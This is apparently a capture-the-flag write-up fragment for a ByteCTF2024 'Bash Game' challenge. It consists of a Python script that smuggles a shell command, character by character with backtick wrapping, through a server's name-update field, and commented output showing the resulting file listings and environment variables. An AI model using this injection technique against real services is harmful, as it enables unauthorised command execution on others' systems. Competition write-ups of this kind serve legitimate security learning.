利用&可以将匹配到的内容再写入进去

ByteCTF2024 Misc Bash Game

import requests

url = "xxxx"
#url = "<http://127.0.0.1:23333/>"

cmd = "ls -al /opt/challenge/"

datas = ["a", "&\\\\`$"]
for ch in cmd:
    if ch == " ":
        datas.append("&\\t$")
    elif ch == "/":
        datas.append("&\\/$")
    else:
        datas.append("&"+ch+"$") # this
datas.append("&\\\\`$")
datas.append("aaaaaaaaaaaaaaaaaaa")

for data in datas:
    resp = requests.post(f"{url}update", data={'name':data})
    print(resp.content)

    # /
    # app bin boot dev docker-entrypoint.d docker-entrypoint.sh etc home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var
    # SHELL=/bin/sh HOSTNAME=a9ceb9a37178 PWD=/ LOGNAME=ctf _=/usr/bin/env PKG_RELEASE=1~bookworm HOME=/home/ctf DYNPKG_RELEASE=2~bookworm NJS_VERSION=0.8.5 USER=ctf SHLVL=0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin NGINX_VERSION=1.27.1 MAIL=/var/mail/ctf NJS_RELEASE=1~bookworm
    # total 16\\ndrwxr-xr-x 1 ctf  ctf   44 Sep 21 06:02 .\\ndrwxr-xr-x 1 root root  31 Sep 10 07:55 ..\\n-rwxrwxrwx 1 ctf  ctf  327 Sep 21 06:02 ctf.sh\\n-rwx------ 1 root root  42 Sep 21 05:54 flag\\n-rwxrwxrwx 1 ctf  ctf  196 Sep  4 11:13 ops.sh\\n-rwxr-xr-x 1 root root  81 Sep  6 04:09 truegame.sh